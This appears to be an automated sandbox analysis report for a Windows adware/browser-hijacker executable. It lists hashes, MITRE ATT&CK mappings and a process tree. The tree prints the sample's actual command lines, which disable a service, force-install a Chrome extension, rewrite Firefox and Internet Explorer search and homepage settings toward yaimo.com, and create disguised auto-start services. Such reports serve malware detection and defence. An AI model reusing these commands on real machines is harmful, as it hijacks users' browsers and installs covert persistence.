208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5

Analysis

max time kernel
36s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
25-11-2022 22:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Size

776KB
MD5

d1acfda5165dd86b7a7c02a914a5f840
SHA1

27df9a373ebfbf747fe1bda42d4794d2bfa7475b
SHA256

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5
SHA512

4d9bfa86b9da0d690f3256cd6be89ba32d7035e9fad4699a0e823a636188f784b2b22bbd55c805c7bee429db3578b7d3810da195241d3189cd2952938c970d30
SSDEEP

12288:0zNq8W0SE8wvSS0dvS3O4b1julJ3MzDme8G1C88tfwDdwnCuw:0zNq8W0SE80SScoO4bBuJCD/6W9uw

Score

8^/10

discovery evasion persistence spyware stealer

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 3 IoCs

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.execmd.exe

description	ioc	process
File created	C:\Program Files (x86)\Yaimo\games.exe	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
File opened for modification	C:\Program Files (x86)\Yaimo\games.exe	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
File created	C:\Program Files (x86)\Yaimo\bsp	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1048 sc.exe
1628 sc.exe
1600 sc.exe
1056 sc.exe
1644 sc.exe
1864 sc.exe
1632 sc.exe
872 sc.exe
1692 sc.exe
924 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1048	sc.exe
1628	sc.exe
1600	sc.exe
1056	sc.exe
1644	sc.exe
1864	sc.exe
1632	sc.exe
872	sc.exe
1692	sc.exe
924	sc.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.yaimo.com/search?q={searchTerms}"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\TopResultURLFallback = "http://www.yaimo.com/search?q={searchTerms}"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://www.yaimo.com/search?q={searchTerms}"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

pid	process
1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

pid process

1488 208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1488 wrote to memory of 1320	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1320	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1320	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1320	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1688	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1688	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1688	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1688	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1688 wrote to memory of 1632	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1632	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1632	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1632	1688	cmd.exe	sc.exe
PID 1320 wrote to memory of 1628	1320	cmd.exe	sc.exe
PID 1320 wrote to memory of 1628	1320	cmd.exe	sc.exe
PID 1320 wrote to memory of 1628	1320	cmd.exe	sc.exe
PID 1320 wrote to memory of 1628	1320	cmd.exe	sc.exe
PID 1488 wrote to memory of 460	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 460	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 460	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 460	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1048	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1048	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1048	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1048	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1540	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1540	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1540	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1540	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1540 wrote to memory of 1292	1540	cmd.exe	xcopy.exe
PID 1540 wrote to memory of 1292	1540	cmd.exe	xcopy.exe
PID 1540 wrote to memory of 1292	1540	cmd.exe	xcopy.exe
PID 1540 wrote to memory of 1292	1540	cmd.exe	xcopy.exe
PID 1048 wrote to memory of 1864	1048	cmd.exe	xcopy.exe
PID 1048 wrote to memory of 1864	1048	cmd.exe	xcopy.exe
PID 1048 wrote to memory of 1864	1048	cmd.exe	xcopy.exe
PID 1048 wrote to memory of 1864	1048	cmd.exe	xcopy.exe
PID 1488 wrote to memory of 624	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 624	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 624	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 624	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 624 wrote to memory of 1212	624	cmd.exe	xcopy.exe
PID 624 wrote to memory of 1212	624	cmd.exe	xcopy.exe
PID 624 wrote to memory of 1212	624	cmd.exe	xcopy.exe
PID 624 wrote to memory of 1212	624	cmd.exe	xcopy.exe
PID 1488 wrote to memory of 1772	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1772	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1772	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1772	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 952	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 952	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 952	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 952	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1772 wrote to memory of 1572	1772	cmd.exe	xcopy.exe
PID 1772 wrote to memory of 1572	1772	cmd.exe	xcopy.exe
PID 1772 wrote to memory of 1572	1772	cmd.exe	xcopy.exe
PID 1772 wrote to memory of 1572	1772	cmd.exe	xcopy.exe
PID 1772 wrote to memory of 852	1772	cmd.exe	xcopy.exe
PID 1772 wrote to memory of 852	1772	cmd.exe	xcopy.exe
PID 1772 wrote to memory of 852	1772	cmd.exe	xcopy.exe
PID 1772 wrote to memory of 852	1772	cmd.exe	xcopy.exe
PID 1488 wrote to memory of 1708	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1708	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1708	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 1488 wrote to memory of 1708	1488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
"C:\Users\Admin\AppData\Local\Temp\208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe"
1⤵
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc stop CltMngSvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1320
- - C:\Windows\SysWOW64\sc.exe
    sc stop CltMngSvc
    3⤵
    - Launches sc.exe
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc config CltMngSvc start= disabled
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1688
- - C:\Windows\SysWOW64\sc.exe
    sc config CltMngSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" C:/Program Files (x86)/Yaimo/yaimo.crx" /f & reg add "HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl" /v "version" /t "reg_sz" /d "1.0" /f & exit"
  2⤵
  PID:460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl" & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl"
    3⤵
    - Enumerates system info in registry
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl" & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl"
    3⤵
    - Enumerates system info in registry
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "@echo on & for /D %f in ("%SystemDrive%\Users\*") do for /D %d in ("%f\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*") do cd "%d" && xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\searchplugins" searchplugins && echo user_pref("network.automatic-ntlm-auth.trusted-uris", "yaimo.com");>>"prefs.js" && echo user_pref("browser.startup.homepage", "http://yaimo.com");>>"prefs.js" && echo user_pref("keyword.URL", "http://www.yaimo.com/search?q=");>>"prefs.js" && echo user_pref("browser.startup.page", 1);>>"prefs.js" && echo user_pref("browser.newtab.url", "http://yaimo.com");>>"prefs.js" && echo user_pref("browser.search.selectedEngine", "Search in Yaimo");>>"prefs.js" && echo user_pref("browser.search.defaultenginename", "Search in Yaimo");>>"prefs.js" && echo @namespace url("http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul");>>"chrome/userChrome.css" && echo #search-container {min-width:700px;}>>"chrome/userChrome.css" & set ffile= & cd %windir%"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:624
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\searchplugins" searchplugins
    3⤵
    - Enumerates system info in registry
    PID:1212
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "@echo on & cd "%APPDATA%" && xcopy /S /Y /i "Mozilla" "%SystemDrive%\Users\Default\AppData\Roaming\Mozilla" && cd "..\Local" && xcopy /S /Y /i "Google" "%SystemDrive%\Users\Default\AppData\Local\Google" & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "Mozilla" "C:\Users\Default\AppData\Roaming\Mozilla"
    3⤵
    - Enumerates system info in registry
    PID:1572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "Google" "C:\Users\Default\AppData\Local\Google"
    3⤵
    - Enumerates system info in registry
    PID:852
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C echo Desktop > "C:\Program Files (x86)\Yaimo\bsp"
  2⤵
  - Drops file in Program Files directory
  PID:952
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc create ISProtect binpath= "C:\Program Files (x86)\Yaimo\w3cczsOwUEgps9S1I8B1.exe" start= auto
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\sc.exe
    sc create ISProtect binpath= "C:\Program Files (x86)\Yaimo\w3cczsOwUEgps9S1I8B1.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc config ISProtect binpath= "C:\Program Files (x86)\Yaimo\w3cczsOwUEgps9S1I8B1.exe" start= auto
  2⤵
  PID:528
- - C:\Windows\SysWOW64\sc.exe
    sc config ISProtect binpath= "C:\Program Files (x86)\Yaimo\w3cczsOwUEgps9S1I8B1.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc description ISProtect "Brutal Search Protect"
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\sc.exe
    sc description ISProtect "Brutal Search Protect"
    3⤵
    - Launches sc.exe
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc start ISProtect
  2⤵
  PID:296
- - C:\Windows\SysWOW64\sc.exe
    sc start ISProtect
    3⤵
    - Launches sc.exe
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc create SysISec binpath= "C:\Windows\system32\jIdmS5jebAvq4PRn0osT.exe" start= auto
  2⤵
  PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc create SysISec binpath= "C:\Windows\system32\jIdmS5jebAvq4PRn0osT.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc config SysISec binpath= "C:\Windows\system32\jIdmS5jebAvq4PRn0osT.exe" start= delayed-auto
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\sc.exe
    sc config SysISec binpath= "C:\Windows\system32\jIdmS5jebAvq4PRn0osT.exe" start= delayed-auto
    3⤵
    - Launches sc.exe
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc description SysISec "System Internet Security"
  2⤵
  PID:660
- - C:\Windows\SysWOW64\sc.exe
    sc description SysISec "System Internet Security"
    3⤵
    - Launches sc.exe
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc start SysISec
  2⤵
  PID:1724
- - C:\Windows\SysWOW64\sc.exe
    sc start SysISec
    3⤵
    - Launches sc.exe
    PID:924

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Privilege Escalation

New Service

T1050

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
7c86c39fba24fb3006a88f04e8b30e39

SHA1
f609c0685d054775c38cde228e168215087e2491

SHA256
96951f33ec1dacb186c351a5245d7a5340d05137db666b291efe4a0fc102a690

SHA512
7cb02ba90e37f2f391f7176cf616a39155919b37b16fe841a38db6975573465f2130fa6fa1d8d999babecb47ad632d710c146a43b8cfec664b54d69e39673050

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

Filesize
88KB

MD5
bc8a84bd38bf431576f58764643695f8

SHA1
127c7199d8116bd5c2ab1d32a77c57b2832f2557

SHA256
0f9dd6a14ea7ce169285cf4f422140926dcb06126916ae0e7c3b59ef79da5b13

SHA512
1fb404d9fe14095b682a4ace3b3adfde9a77da0c17c242ed4c9b919d76de229a7df4fc08fd19b8213b22533408a1bc40a91c46e7120ddfaaf5bac145c33cff65

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\au9ni2dm.default-release\prefs.js

Filesize
6KB

MD5
912f12876b0e4fa85c746faefba49670

SHA1
f5fa05c04fd7a85cbb15969139e59acb753f2df4

SHA256
cb39f78f56e660de2f0ab29b39890cd62a43e3b68aa331ff7397f2d9da379a58

SHA512
20a99c2ebface2eed8562076f998b156aeb7d732b508a984651ce9eb0905e1766e56232c8f7f94c8253cdb460979158fd8b0956e860fa3a916c64e1356cad092

Download Submit
memory/296-76-0x0000000000000000-mapping.dmp

Download
memory/460-59-0x0000000000000000-mapping.dmp

Download
memory/528-73-0x0000000000000000-mapping.dmp

Download
memory/624-64-0x0000000000000000-mapping.dmp

Download
memory/660-82-0x0000000000000000-mapping.dmp

Download
memory/852-70-0x0000000000000000-mapping.dmp

Download
memory/872-75-0x0000000000000000-mapping.dmp

Download
memory/924-86-0x0000000000000000-mapping.dmp

Download
memory/952-67-0x0000000000000000-mapping.dmp

Download
memory/1048-85-0x0000000000000000-mapping.dmp

Download
memory/1048-60-0x0000000000000000-mapping.dmp

Download
memory/1056-79-0x0000000000000000-mapping.dmp

Download
memory/1116-78-0x0000000000000000-mapping.dmp

Download
memory/1212-65-0x0000000000000000-mapping.dmp

Download
memory/1292-62-0x0000000000000000-mapping.dmp

Download
memory/1320-55-0x0000000000000000-mapping.dmp

Download
memory/1464-80-0x0000000000000000-mapping.dmp

Download
memory/1488-54-0x0000000076681000-0x0000000076683000-memory.dmp

Filesize
8KB

Download
memory/1540-61-0x0000000000000000-mapping.dmp

Download
memory/1572-68-0x0000000000000000-mapping.dmp

Download
memory/1600-77-0x0000000000000000-mapping.dmp

Download
memory/1628-58-0x0000000000000000-mapping.dmp

Download
memory/1632-57-0x0000000000000000-mapping.dmp

Download
memory/1644-81-0x0000000000000000-mapping.dmp

Download
memory/1688-56-0x0000000000000000-mapping.dmp

Download
memory/1708-72-0x0000000000000000-mapping.dmp

Download
memory/1724-83-0x0000000000000000-mapping.dmp

Download
memory/1772-66-0x0000000000000000-mapping.dmp

Download
memory/1864-63-0x0000000000000000-mapping.dmp

Download
memory/1864-84-0x0000000000000000-mapping.dmp

Download
memory/2000-74-0x0000000000000000-mapping.dmp

Download